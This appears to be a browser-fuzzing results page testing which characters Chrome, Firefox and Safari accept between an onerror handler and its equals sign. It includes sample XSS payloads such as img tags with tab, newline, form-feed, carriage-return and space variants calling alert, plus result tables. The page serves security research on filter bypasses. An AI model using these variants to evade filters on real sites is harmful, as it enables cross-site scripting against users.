Character allowed after onerror event
I want to know which characters the browser accepts between an event handler and a equal sign.
Created by: InsertScript
Created on: Tuesday, April 2, 2024 at 9:47:31 AM
Updated on: Wednesday, July 17, 2024 at 10:52:20 AM
Vector type: XSS
Template used:
<img src=x onerror$[chr]=log($[i])>
Your browser was detected as:
Detecting... Detecting... Detecting... Detecting...
Sample payloads
<img src=x onerror =alert(9)>
<img src=x onerror
=alert(10)>
<img src=x onerror=alert(12)>
<img src=x onerror
=alert(13)>
<img src=x onerror =alert(32)>
Fuzz results
![Chrome logo](/_next/image?url=%2Flogos%2Fbrowsers%2Fchrome.png&w=64&q=75)
Chrome 123.0.0.0 Unknown Unknown
Found 5 results
Dec | Hex | Chr |
---|---|---|
9 | 09 | HT |
Dec | Hex | Chr |
---|---|---|
10 | 0a | LF |
Dec | Hex | Chr |
---|---|---|
12 | 0c | FF |
Dec | Hex | Chr |
---|---|---|
13 | 0d | CR |
Dec | Hex | Chr |
---|---|---|
32 | 20 | SPACE |
![Firefox logo](/_next/image?url=%2Flogos%2Fbrowsers%2Ffirefox.png&w=64&q=75)
Firefox 124.0 Unknown Unknown
Found 5 results
Dec | Hex | Chr |
---|---|---|
9 | 09 | HT |
Dec | Hex | Chr |
---|---|---|
10 | 0a | LF |
Dec | Hex | Chr |
---|---|---|
12 | 0c | FF |
Dec | Hex | Chr |
---|---|---|
13 | 0d | CR |
Dec | Hex | Chr |
---|---|---|
32 | 20 | SPACE |
![Safari logo](/_next/image?url=%2Flogos%2Fbrowsers%2Fsafari.png&w=64&q=75)
Safari 17.4 Unknown Unknown
Found 5 results
Dec | Hex | Chr |
---|---|---|
9 | 09 | HT |
Dec | Hex | Chr |
---|---|---|
10 | 0a | LF |
Dec | Hex | Chr |
---|---|---|
12 | 0c | FF |
Dec | Hex | Chr |
---|---|---|
13 | 0d | CR |
Dec | Hex | Chr |
---|---|---|
32 | 20 | SPACE |